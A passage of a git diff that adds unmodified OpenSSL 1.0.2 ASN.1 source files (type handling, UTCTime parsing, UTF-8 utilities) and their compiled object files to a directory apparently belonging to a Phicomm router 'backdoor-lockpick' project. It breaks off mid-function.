+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/objects.h>
+
+int ASN1_TYPE_get(ASN1_TYPE *a)
+{
+    if ((a->value.ptr != NULL) || (a->type == V_ASN1_NULL))
+        return (a->type);
+    else
+        return (0);
+}
+
+void ASN1_TYPE_set(ASN1_TYPE *a, int type, void *value)
+{
+    if (a->value.ptr != NULL) {
+        ASN1_TYPE **tmp_a = &a;
+        ASN1_primitive_free((ASN1_VALUE **)tmp_a, NULL);
+    }
+    a->type = type;
+    if (type == V_ASN1_BOOLEAN)
+        a->value.boolean = value ? 0xff : 0;
+    else
+        a->value.ptr = value;
+}
+
+int ASN1_TYPE_set1(ASN1_TYPE *a, int type, const void *value)
+{
+    if (!value || (type == V_ASN1_BOOLEAN)) {
+        void *p = (void *)value;
+        ASN1_TYPE_set(a, type, p);
+    } else if (type == V_ASN1_OBJECT) {
+        ASN1_OBJECT *odup;
+        odup = OBJ_dup(value);
+        if (!odup)
+            return 0;
+        ASN1_TYPE_set(a, type, odup);
+    } else {
+        ASN1_STRING *sdup;
+        sdup = ASN1_STRING_dup(value);
+        if (!sdup)
+            return 0;
+        ASN1_TYPE_set(a, type, sdup);
+    }
+    return 1;
+}
+
+IMPLEMENT_STACK_OF(ASN1_TYPE)
+
+IMPLEMENT_ASN1_SET_OF(ASN1_TYPE)
+
+/* Returns 0 if they are equal, != 0 otherwise. */
+int ASN1_TYPE_cmp(const ASN1_TYPE *a, const ASN1_TYPE *b)
+{
+    int result = -1;
+
+    if (!a || !b || a->type != b->type)
+        return -1;
+
+    switch (a->type) {
+    case V_ASN1_OBJECT:
+        result = OBJ_cmp(a->value.object, b->value.object);
+        break;
+    case V_ASN1_NULL:
+        result = 0;             /* They do not have content. */
+        break;
+    case V_ASN1_INTEGER:
+    case V_ASN1_NEG_INTEGER:
+    case V_ASN1_ENUMERATED:
+    case V_ASN1_NEG_ENUMERATED:
+    case V_ASN1_BIT_STRING:
+    case V_ASN1_OCTET_STRING:
+    case V_ASN1_SEQUENCE:
+    case V_ASN1_SET:
+    case V_ASN1_NUMERICSTRING:
+    case V_ASN1_PRINTABLESTRING:
+    case V_ASN1_T61STRING:
+    case V_ASN1_VIDEOTEXSTRING:
+    case V_ASN1_IA5STRING:
+    case V_ASN1_UTCTIME:
+    case V_ASN1_GENERALIZEDTIME:
+    case V_ASN1_GRAPHICSTRING:
+    case V_ASN1_VISIBLESTRING:
+    case V_ASN1_GENERALSTRING:
+    case V_ASN1_UNIVERSALSTRING:
+    case V_ASN1_BMPSTRING:
+    case V_ASN1_UTF8STRING:
+    case V_ASN1_OTHER:
+    default:
+        result = ASN1_STRING_cmp((ASN1_STRING *)a->value.ptr,
+                                 (ASN1_STRING *)b->value.ptr);
+        break;
+    }
+
+    return result;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_type.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_type.o
new file mode 100644
index 0000000000000000000000000000000000000000..cc2f12a0ac07e2206fbfb0b7becc025f1289aab1
GIT binary patch
literal 2328
zcmbu9TWb?h5P(mTrdc(nv8Y5U5~O%{NmQs-k)|chvDCKM6uh#gb#05L4awQss@R7m
z(j^r91A;$7#3u>X2VVry2mJ|Z1rhN=y~LTb=d|1H=0yi)XXe|PIcLvhXVbmiexHv>
z@sX2cC6bhox4{*^gS#DMBMFl)O*@vTIjfLL$OxG~g3O<+E+8DTz7A6BH8nrR_<L&I
zZdF*A&VxyQdxtG(CEKc4`)V(YC^dijwpG8sY<g6+I+eu+YMoc8`7CzflHH72zp3>G
znnh{(6$_ewd`6I3ON$BfPouGwcYD%^Ev=`tTs5{OtBX4=)*80Q;gBs>08r}_XOHnC
zVT7nX04>+pZd(4vc2+{i8;$MwB`vfvrO?W(V*Y3}g70z0{9!(?Ex<>TOjlQXe9zFZ
zF~N-ZG4-&TIGAiRc$mC%D4`~f?6omgHh@M!aTzmxL&Q%=6<GijWwULF@8%ien~wTg
z!Xf1z%n@t0i+5XuZ3UYU{%N%7Nc671D-tsUnMmSRB$kRqQxS#NofUbx<-DFq+&{n*
zu=lih-zIE5gUi)GKG(e72Ru&<ew+Nd)l~t$8mk#b0fJk&Rstln76J(nr4Dx-R*|tD
zY_nsYaxG(m%b2exuw9_IK5jVyz>5z6$Ns~jfUh_BTAlpSI{XH3?6UwCMea)(e6Mlm
z>u{3O*i1oJM@VY0FR5kE4WzYEojIZsL|Ue|zcbaV^>=p<rn6c$)!CcY?3_YzJU`CH
zr*!RVQP)@3B}sp0k9Nf<*my8|=2Ty1CFX;T<O@6tEuVtO!WiTzK0xpegh7ARY`KdN
z1bGBh@(19fAa4Sd{2@XR<haL@e?SO=d=seTpAdo|Zw8e-4n7LpORhYC#}VO3F3-tD
z7nl2f+r{NR616mwXSrdptZ3UY=@s?sIhE<tjHp*~EJxJgQi-S|lli<p0c>KD=_>p)
z4whJM<eG>_Ck(YvoGj=?HbYe2K_7#y%H?%2ga0#eD91bRzL6ckP?l`7{KQ<Rv_ODs
z+~I`aPa_1mXB)m}SSxQb-bWO?f5_c`kaqV#m<-~^2Y_MEf2~i7o(Zr{k>l@oLh$AI
z(zZL8GgX%fPUw-_0}TIqc<!7sChFr(2)<lDiSayQs=Izp)X&L8VcqqYfP3wqB7Uux
zMIGKbtd;e0|GdV=lBk%_b1{z%z}9)xBXjQ^Ao5ng`xrPxv|A>4=e_F3#Qd)>XWEXt
F{x7Qq9sd9T

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utctm.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utctm.c
new file mode 100644
index 0000000..0578c88
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utctm.c
@@ -0,0 +1,352 @@
+/* crypto/asn1/a_utctm.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include "o_time.h"
+#include <openssl/asn1.h>
+#include "asn1_locl.h"
+
+#if 0
+int i2d_ASN1_UTCTIME(ASN1_UTCTIME *a, unsigned char **pp)
+{
+# ifndef CHARSET_EBCDIC
+    return (i2d_ASN1_bytes((ASN1_STRING *)a, pp,
+                           V_ASN1_UTCTIME, V_ASN1_UNIVERSAL));
+# else
+    /* KLUDGE! We convert to ascii before writing DER */
+    int len;
+    char tmp[24];
+    ASN1_STRING x = *(ASN1_STRING *)a;
+
+    len = x.length;
+    ebcdic2ascii(tmp, x.data, (len >= sizeof tmp) ? sizeof tmp : len);
+    x.data = tmp;
+    return i2d_ASN1_bytes(&x, pp, V_ASN1_UTCTIME, V_ASN1_UNIVERSAL);
+# endif
+}
+
+ASN1_UTCTIME *d2i_ASN1_UTCTIME(ASN1_UTCTIME **a, unsigned char **pp,
+                               long length)
+{
+    ASN1_UTCTIME *ret = NULL;
+
+    ret = (ASN1_UTCTIME *)d2i_ASN1_bytes((ASN1_STRING **)a, pp, length,
+                                         V_ASN1_UTCTIME, V_ASN1_UNIVERSAL);
+    if (ret == NULL) {
+        ASN1err(ASN1_F_D2I_ASN1_UTCTIME, ERR_R_NESTED_ASN1_ERROR);
+        return (NULL);
+    }
+# ifdef CHARSET_EBCDIC
+    ascii2ebcdic(ret->data, ret->data, ret->length);
+# endif
+    if (!ASN1_UTCTIME_check(ret)) {
+        ASN1err(ASN1_F_D2I_ASN1_UTCTIME, ASN1_R_INVALID_TIME_FORMAT);
+        goto err;
+    }
+
+    return (ret);
+ err:
+    if ((ret != NULL) && ((a == NULL) || (*a != ret)))
+        M_ASN1_UTCTIME_free(ret);
+    return (NULL);
+}
+
+#endif
+
+int asn1_utctime_to_tm(struct tm *tm, const ASN1_UTCTIME *d)
+{
+    static const int min[8] = { 0, 1, 1, 0, 0, 0, 0, 0 };
+    static const int max[8] = { 99, 12, 31, 23, 59, 59, 12, 59 };
+    char *a;
+    int n, i, l, o;
+
+    if (d->type != V_ASN1_UTCTIME)
+        return (0);
+    l = d->length;
+    a = (char *)d->data;
+    o = 0;
+
+    if (l < 11)
+        goto err;
+    for (i = 0; i < 6; i++) {
+        if ((i == 5) && ((a[o] == 'Z') || (a[o] == '+') || (a[o] == '-'))) {
+            i++;
+            if (tm)
+                tm->tm_sec = 0;
+            break;
+        }
+        if ((a[o] < '0') || (a[o] > '9'))
+            goto err;
+        n = a[o] - '0';
+        if (++o > l)
+            goto err;
+
+        if ((a[o] < '0') || (a[o] > '9'))
+            goto err;
+        n = (n * 10) + a[o] - '0';
+        if (++o > l)
+            goto err;
+
+        if ((n < min[i]) || (n > max[i]))
+            goto err;
+        if (tm) {
+            switch (i) {
+            case 0:
+                tm->tm_year = n < 50 ? n + 100 : n;
+                break;
+            case 1:
+                tm->tm_mon = n - 1;
+                break;
+            case 2:
+                tm->tm_mday = n;
+                break;
+            case 3:
+                tm->tm_hour = n;
+                break;
+            case 4:
+                tm->tm_min = n;
+                break;
+            case 5:
+                tm->tm_sec = n;
+                break;
+            }
+        }
+    }
+    if (a[o] == 'Z')
+        o++;
+    else if ((a[o] == '+') || (a[o] == '-')) {
+        int offsign = a[o] == '-' ? -1 : 1, offset = 0;
+        o++;
+        if (o + 4 > l)
+            goto err;
+        for (i = 6; i < 8; i++) {
+            if ((a[o] < '0') || (a[o] > '9'))
+                goto err;
+            n = a[o] - '0';
+            o++;
+            if ((a[o] < '0') || (a[o] > '9'))
+                goto err;
+            n = (n * 10) + a[o] - '0';
+            if ((n < min[i]) || (n > max[i]))
+                goto err;
+            if (tm) {
+                if (i == 6)
+                    offset = n * 3600;
+                else if (i == 7)
+                    offset += n * 60;
+            }
+            o++;
+        }
+        if (offset && !OPENSSL_gmtime_adj(tm, 0, offset * offsign))
+            return 0;
+    }
+    return o == l;
+ err:
+    return 0;
+}
+
+int ASN1_UTCTIME_check(const ASN1_UTCTIME *d)
+{
+    return asn1_utctime_to_tm(NULL, d);
+}
+
+int ASN1_UTCTIME_set_string(ASN1_UTCTIME *s, const char *str)
+{
+    ASN1_UTCTIME t;
+
+    t.type = V_ASN1_UTCTIME;
+    t.length = strlen(str);
+    t.data = (unsigned char *)str;
+    if (ASN1_UTCTIME_check(&t)) {
+        if (s != NULL) {
+            if (!ASN1_STRING_set((ASN1_STRING *)s,
+                                 (unsigned char *)str, t.length))
+                return 0;
+            s->type = V_ASN1_UTCTIME;
+        }
+        return (1);
+    } else
+        return (0);
+}
+
+ASN1_UTCTIME *ASN1_UTCTIME_set(ASN1_UTCTIME *s, time_t t)
+{
+    return ASN1_UTCTIME_adj(s, t, 0, 0);
+}
+
+ASN1_UTCTIME *ASN1_UTCTIME_adj(ASN1_UTCTIME *s, time_t t,
+                               int offset_day, long offset_sec)
+{
+    char *p;
+    struct tm *ts;
+    struct tm data;
+    size_t len = 20;
+    int free_s = 0;
+
+    if (s == NULL) {
+        free_s = 1;
+        s = M_ASN1_UTCTIME_new();
+    }
+    if (s == NULL)
+        goto err;
+
+    ts = OPENSSL_gmtime(&t, &data);
+    if (ts == NULL)
+        goto err;
+
+    if (offset_day || offset_sec) {
+        if (!OPENSSL_gmtime_adj(ts, offset_day, offset_sec))
+            goto err;
+    }
+
+    if ((ts->tm_year < 50) || (ts->tm_year >= 150))
+        goto err;
+
+    p = (char *)s->data;
+    if ((p == NULL) || ((size_t)s->length < len)) {
+        p = OPENSSL_malloc(len);
+        if (p == NULL) {
+            ASN1err(ASN1_F_ASN1_UTCTIME_ADJ, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (s->data != NULL)
+            OPENSSL_free(s->data);
+        s->data = (unsigned char *)p;
+    }
+
+    BIO_snprintf(p, len, "%02d%02d%02d%02d%02d%02dZ", ts->tm_year % 100,
+                 ts->tm_mon + 1, ts->tm_mday, ts->tm_hour, ts->tm_min,
+                 ts->tm_sec);
+    s->length = strlen(p);
+    s->type = V_ASN1_UTCTIME;
+#ifdef CHARSET_EBCDIC_not
+    ebcdic2ascii(s->data, s->data, s->length);
+#endif
+    return (s);
+ err:
+    if (free_s && s)
+        M_ASN1_UTCTIME_free(s);
+    return NULL;
+}
+
+int ASN1_UTCTIME_cmp_time_t(const ASN1_UTCTIME *s, time_t t)
+{
+    struct tm stm, ttm;
+    int day, sec;
+
+    if (!asn1_utctime_to_tm(&stm, s))
+        return -2;
+
+    if (!OPENSSL_gmtime(&t, &ttm))
+        return -2;
+
+    if (!OPENSSL_gmtime_diff(&day, &sec, &stm, &ttm))
+        return -2;
+
+    if (day > 0)
+        return 1;
+    if (day < 0)
+        return -1;
+    if (sec > 0)
+        return 1;
+    if (sec < 0)
+        return -1;
+    return 0;
+}
+
+#if 0
+time_t ASN1_UTCTIME_get(const ASN1_UTCTIME *s)
+{
+    struct tm tm;
+    int offset;
+
+    memset(&tm, '\0', sizeof tm);
+
+# define g2(p) (((p)[0]-'0')*10+(p)[1]-'0')
+    tm.tm_year = g2(s->data);
+    if (tm.tm_year < 50)
+        tm.tm_year += 100;
+    tm.tm_mon = g2(s->data + 2) - 1;
+    tm.tm_mday = g2(s->data + 4);
+    tm.tm_hour = g2(s->data + 6);
+    tm.tm_min = g2(s->data + 8);
+    tm.tm_sec = g2(s->data + 10);
+    if (s->data[12] == 'Z')
+        offset = 0;
+    else {
+        offset = g2(s->data + 13) * 60 + g2(s->data + 15);
+        if (s->data[12] == '-')
+            offset = -offset;
+    }
+# undef g2
+
+    /*
+     * FIXME: mktime assumes the current timezone
+     * instead of UTC, and unless we rewrite OpenSSL
+     * in Lisp we cannot locally change the timezone
+     * without possibly interfering with other parts
+     * of the program. timegm, which uses UTC, is
+     * non-standard.
+     * Also time_t is inappropriate for general
+     * UTC times because it may a 32 bit type.
+     */
+    return mktime(&tm) - offset * 60;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utctm.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utctm.o
new file mode 100644
index 0000000000000000000000000000000000000000..0bcff369270edd7a0ed3284316533103d5328d9d
GIT binary patch
literal 4984
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utf8.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utf8.c
new file mode 100644
index 0000000..23dc2e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_utf8.c
@@ -0,0 +1,237 @@
+/* crypto/asn1/a_utf8.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+/* UTF8 utilities */
+
+/*-
+ * This parses a UTF8 string one character at a time. It is passed a pointer
+ * to the string and the length of the string. It sets 'value' to the value of
+ * the current character. It returns the number of characters read or a
+ * negative error code:
+ * -1 = string too short
+ * -2 = illegal character
+ * -3 = subsequent characters not of the form 10xxxxxx
+ * -4 = character encoded incorrectly (not minimal length).
+ */
+
+int UTF8_getc(const unsigned char *str, int len, unsigned long *val)
+{
+    const unsigned char *p;
+    unsigned long value;
+    int ret;
+    if (len <= 0)
+        return 0;
+    p = str;
+
+    /* Check syntax and work out the encoded value (if correct) */
+    if ((*p & 0x80) == 0) {
+        value = *p++ & 0x7f;
+        ret = 1;
+    } else if ((*p & 0xe0) == 0xc0) {
+        if (len < 2)
+            return -1;
+        if ((p[1] & 0xc0) != 0x80)
+            return -3;
+        value = (*p++ & 0x1f) << 6;
+        value |= *p++ & 0x3f;
+        if (value < 0x80)
+            return -4;
+        ret = 2;
+    } else if ((*p & 0xf0) == 0xe0) {
+        if (len < 3)
+            return -1;
+        if (((p[1] & 0xc0) != 0x80)
+            || ((p[2] & 0xc0) != 0x80))
+            return -3;
+        value = (*p++ & 0xf) << 12;
+        value |= (*p++ & 0x3f) << 6;
+        value |= *p++ & 0x3f;
+        if (value < 0x800)
+            return -4;
+        ret = 3;
+    } else if ((*p & 0xf8) == 0xf0) {
+        if (len < 4)
+            return -1;
+        if (((p[1] & 0xc0) != 0x80)
+            || ((p[2] & 0xc0) != 0x80)
+            || ((p[3] & 0xc0) != 0x80))
+            return -3;
+        value = ((unsigned long)(*p++ & 0x7)) << 18;
+        value |= (*p++ & 0x3f) << 12;
+        value |= (*p++ & 0x3f) << 6;
+        value |= *p++ & 0x3f;
+        if (value < 0x10000)
+            return -4;
+        ret = 4;
+    } else if ((*p & 0xfc) == 0xf8) {
+        if (len < 5)
+            return -1;
+        if (((p[1] & 0xc0) != 0x80)
+            || ((p[2] & 0xc0) != 0x80)
+            || ((p[3] & 0xc0) != 0x80)
+            || ((p[4] & 0xc0) != 0x80))
+            return -3;
+        value = ((unsigned long)(*p++ & 0x3)) << 24;
+        value |= ((unsigned long)(*p++ & 0x3f)) << 18;
+        value |= ((unsigned long)(*p++ & 0x3f)) << 12;
+        value |= (*p++ & 0x3f) << 6;
+        value |= *p++ & 0x3f;
+        if (value < 0x200000)
+            return -4;
+        ret = 5;
+    } else if ((*p & 0xfe) == 0xfc) {
+        if (len < 6)
+            return -1;
+        if (((p[1] & 0xc0) != 0x80)
+            || ((p[2] & 0xc0) != 0x80)
+            || ((p[3] & 0xc0) != 0x80)
+            || ((p[4] & 0xc0) != 0x80)
+            || ((p[5] & 0xc0) != 0x80))
+            return -3;
+        value = ((unsigned long)(*p++ & 0x1)) << 30;
+        value |= ((unsigned long)(*p++ & 0x3f)) << 24;
+        value |= ((unsigned long)(*p++ & 0x3f)) << 18;
+        value |= ((unsigned long)(*p++ & 0x3f)) << 12;
+        value |= (*p++ & 0x3f) << 6;
+        value |= *p++ & 0x3f;
+        if (value < 0x4000000)
+            return -4;
+        ret = 6;
+    } else
+        return -2;
+    *val = value;
+    return ret;
+}
+
+/*
+ * This takes a character 'value' and writes the UTF8 encoded value in 'str'
+ * where 'str' is a buffer containing 'len' characters. Returns the number of
+ * characters written or -1 if 'len' is too small. 'str' can be set to NULL
+ * in which case it just returns the number of characters. It will need at
+ * most 6 characters.
+ */
+
+int UTF8_putc(unsigned char *str, int len, unsigned long value)
+{
+    if (!str)
